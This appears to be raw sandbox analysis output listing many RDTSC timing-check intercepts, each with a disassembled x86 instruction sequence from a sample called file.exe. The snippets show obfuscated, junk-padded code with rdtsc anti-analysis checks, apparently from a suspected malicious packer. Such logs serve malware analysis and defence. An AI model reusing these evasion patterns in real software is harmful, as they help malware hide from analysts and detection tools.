Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10C1F second address: 4A10C7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7E2CEB1B22h 0x00000010 xor esi, 54F4B2C8h 0x00000016 jmp 00007F7E2CEB1B1Bh 0x0000001b popfd 0x0000001c mov ebx, ecx 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007F7E2CEB1B25h 0x00000025 xchg eax, ebp 0x00000026 jmp 00007F7E2CEB1B1Eh 0x0000002b mov ebp, esp 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10C7D second address: 4A10C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10C81 second address: 4A10C92 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov cl, 83h 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10C92 second address: 4A10C96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10C96 second address: 4A10C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1078C second address: 4A1080C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F7E2CEC3D44h 0x0000000e push eax 0x0000000f jmp 00007F7E2CEC3D3Bh 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 mov ax, 24DBh 0x0000001a mov edx, esi 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f jmp 00007F7E2CEC3D3Ah 0x00000024 pop ebp 0x00000025 pushad 0x00000026 push ecx 0x00000027 pushfd 0x00000028 jmp 00007F7E2CEC3D3Dh 0x0000002d sbb cx, 1C16h 0x00000032 jmp 00007F7E2CEC3D41h 0x00000037 popfd 0x00000038 pop eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F7E2CEC3D47h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10666 second address: 4A1068A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEB1B1Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1068A second address: 4A10690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10690 second address: 4A1069F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1069F second address: 4A106A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A106A3 second address: 4A106B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A106B5 second address: 4A10702 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, A6B4h 0x00000007 pushfd 0x00000008 jmp 00007F7E2CEC3D3Dh 0x0000000d adc si, 9276h 0x00000012 jmp 00007F7E2CEC3D41h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7E2CEC3D49h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10702 second address: 4A1074C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7E2CEB1B20h 0x00000008 sub ax, 11F8h 0x0000000d jmp 00007F7E2CEB1B1Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F7E2CEB1B1Eh 0x00000020 add ch, 00000058h 0x00000023 jmp 00007F7E2CEB1B1Bh 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10408 second address: 4A1042F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEC3D45h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1042F second address: 4A1046A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 mov ecx, 0AC7F78Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007F7E2CEB1B22h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7E2CEB1B27h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20330 second address: 4A2035C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEC3D3Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A2035C second address: 4A203DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7E2CEB1B24h 0x00000011 or ax, 4678h 0x00000016 jmp 00007F7E2CEB1B1Bh 0x0000001b popfd 0x0000001c push eax 0x0000001d movsx edx, ax 0x00000020 pop ecx 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F7E2CEB1B1Dh 0x0000002b or ah, 00000016h 0x0000002e jmp 00007F7E2CEB1B21h 0x00000033 popfd 0x00000034 mov di, si 0x00000037 popad 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F7E2CEB1B29h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A203DF second address: 4A203E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A203E5 second address: 4A203E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A303FE second address: 4A304A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F7E2CEC3D44h 0x00000013 or esi, 25CB2BB8h 0x00000019 jmp 00007F7E2CEC3D3Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F7E2CEC3D48h 0x00000025 xor esi, 1206E618h 0x0000002b jmp 00007F7E2CEC3D3Bh 0x00000030 popfd 0x00000031 popad 0x00000032 and dword ptr [eax], 00000000h 0x00000035 jmp 00007F7E2CEC3D46h 0x0000003a and dword ptr [eax+04h], 00000000h 0x0000003e jmp 00007F7E2CEC3D40h 0x00000043 pop ebp 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F7E2CEC3D3Ah 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A304A0 second address: 4A304A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A104FF second address: 4A10503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10503 second address: 4A10507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10507 second address: 4A1050D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1050D second address: 4A10513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10513 second address: 4A10517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10517 second address: 4A10550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F7E2CEB1B21h 0x00000012 and si, 74B6h 0x00000017 jmp 00007F7E2CEB1B21h 0x0000001c popfd 0x0000001d movzx ecx, dx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10550 second address: 4A10556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10556 second address: 4A1055A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1055A second address: 4A1057A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov esi, 61B81D6Dh 0x00000011 mov cx, 2369h 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov esi, edx 0x0000001d mov esi, ebx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1057A second address: 4A105AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEB1B27h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20EDF second address: 4A20F04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEC3D3Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20F04 second address: 4A20F3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7E2CEB1B21h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7E2CEB1B1Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30206 second address: 4A3020C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A3020C second address: 4A30224 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30224 second address: 4A30236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30236 second address: 4A3025D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEB1B25h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A50650 second address: 4A50660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEC3D3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A50660 second address: 4A5068F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F7E2CEB1B26h 0x00000012 xchg eax, ecx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A5068F second address: 4A506B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, 562CD845h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e mov esi, edi 0x00000010 pushad 0x00000011 mov di, 1D3Eh 0x00000015 mov si, di 0x00000018 popad 0x00000019 popad 0x0000001a xchg eax, ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A506B0 second address: 4A506B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A506B4 second address: 4A506CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A506CE second address: 4A50757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [777265FCh] 0x0000000e jmp 00007F7E2CEB1B26h 0x00000013 test eax, eax 0x00000015 jmp 00007F7E2CEB1B20h 0x0000001a je 00007F7E9FB04D72h 0x00000020 jmp 00007F7E2CEB1B20h 0x00000025 mov ecx, eax 0x00000027 jmp 00007F7E2CEB1B20h 0x0000002c xor eax, dword ptr [ebp+08h] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F7E2CEB1B1Ah 0x00000038 or al, 00000058h 0x0000003b jmp 00007F7E2CEB1B1Bh 0x00000040 popfd 0x00000041 mov si, FE0Fh 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A50757 second address: 4A507D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E2CEC3D3Bh 0x00000009 sub cx, C81Eh 0x0000000e jmp 00007F7E2CEC3D49h 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 and ecx, 1Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F7E2CEC3D3Fh 0x00000025 and eax, 5478722Eh 0x0000002b jmp 00007F7E2CEC3D49h 0x00000030 popfd 0x00000031 call 00007F7E2CEC3D40h 0x00000036 pop ecx 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A507D2 second address: 4A5081F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov eax, ebx 0x00000010 pushfd 0x00000011 jmp 00007F7E2CEB1B29h 0x00000016 sub cx, A276h 0x0000001b jmp 00007F7E2CEB1B21h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A5081F second address: 4A50839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A50839 second address: 4A5087D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, B94Fh 0x00000008 popad 0x00000009 mov dx, ax 0x0000000c popad 0x0000000d retn 0004h 0x00000010 nop 0x00000011 mov esi, eax 0x00000013 lea eax, dword ptr [ebp-08h] 0x00000016 xor esi, dword ptr [002A2014h] 0x0000001c push eax 0x0000001d push eax 0x0000001e push eax 0x0000001f lea eax, dword ptr [ebp-10h] 0x00000022 push eax 0x00000023 call 00007F7E316A229Fh 0x00000028 push FFFFFFFEh 0x0000002a pushad 0x0000002b mov al, 0Ch 0x0000002d push eax 0x0000002e push edx 0x0000002f pushfd 0x00000030 jmp 00007F7E2CEB1B1Fh 0x00000035 and ah, 0000000Eh 0x00000038 jmp 00007F7E2CEB1B29h 0x0000003d popfd 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A5087D second address: 4A5088E instructions: 0x00000000 rdtsc 0x00000002 mov si, B217h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop eax 0x0000000a pushad 0x0000000b mov ax, CD0Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A5088E second address: 4A508B1 instructions: 0x00000000 rdtsc 0x00000002 mov eax, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 ret 0x00000008 nop 0x00000009 push eax 0x0000000a call 00007F7E316A22E5h 0x0000000f mov edi, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7E2CEB1B25h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A508B1 second address: 4A508B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A508B7 second address: 4A508EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7E2CEB1B20h 0x0000000f push eax 0x00000010 jmp 00007F7E2CEB1B1Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 movsx edi, cx 0x0000001c push ecx 0x0000001d pop edx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A508EE second address: 4A50904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEC3D3Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A50904 second address: 4A5091A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A5091A second address: 4A50920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A50920 second address: 4A50926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A50926 second address: 4A5092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0009C second address: 4A000C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E2CEB1B1Dh 0x00000009 jmp 00007F7E2CEB1B1Bh 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 and esp, FFFFFFF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A000C6 second address: 4A000CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A000CB second address: 4A000FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebp 0x0000000a jmp 00007F7E2CEB1B1Eh 0x0000000f mov dword ptr [esp], ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7E2CEB1B27h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A000FF second address: 4A0014F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F7E2CEC3D3Eh 0x0000000f push eax 0x00000010 jmp 00007F7E2CEC3D3Bh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7E2CEC3D45h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0014F second address: 4A00196 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c pushad 0x0000000d jmp 00007F7E2CEB1B1Ch 0x00000012 mov edx, esi 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 jmp 00007F7E2CEB1B1Ch 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7E2CEB1B1Dh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00196 second address: 4A0019C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0019C second address: 4A001B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEB1B23h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A001B3 second address: 4A001B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A001B7 second address: 4A001E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ax, 12ADh 0x00000010 pushfd 0x00000011 jmp 00007F7E2CEB1B1Ah 0x00000016 sbb ecx, 6CC70D48h 0x0000001c jmp 00007F7E2CEB1B1Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A001E5 second address: 4A001EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A001EA second address: 4A00238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, dword ptr [ebp+08h] 0x0000000d pushad 0x0000000e mov edx, 7A4DBE90h 0x00000013 jmp 00007F7E2CEB1B29h 0x00000018 popad 0x00000019 xchg eax, edi 0x0000001a jmp 00007F7E2CEB1B1Eh 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F7E2CEB1B1Dh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00238 second address: 4A0023E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0023E second address: 4A002BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov dl, ch 0x0000000d pushfd 0x0000000e jmp 00007F7E2CEB1B23h 0x00000013 xor ax, 87AEh 0x00000018 jmp 00007F7E2CEB1B29h 0x0000001d popfd 0x0000001e popad 0x0000001f test esi, esi 0x00000021 pushad 0x00000022 pushad 0x00000023 mov dx, cx 0x00000026 mov cl, 32h 0x00000028 popad 0x00000029 pushfd 0x0000002a jmp 00007F7E2CEB1B1Bh 0x0000002f jmp 00007F7E2CEB1B23h 0x00000034 popfd 0x00000035 popad 0x00000036 je 00007F7E9FB4FE7Ah 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A002BD second address: 4A002C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
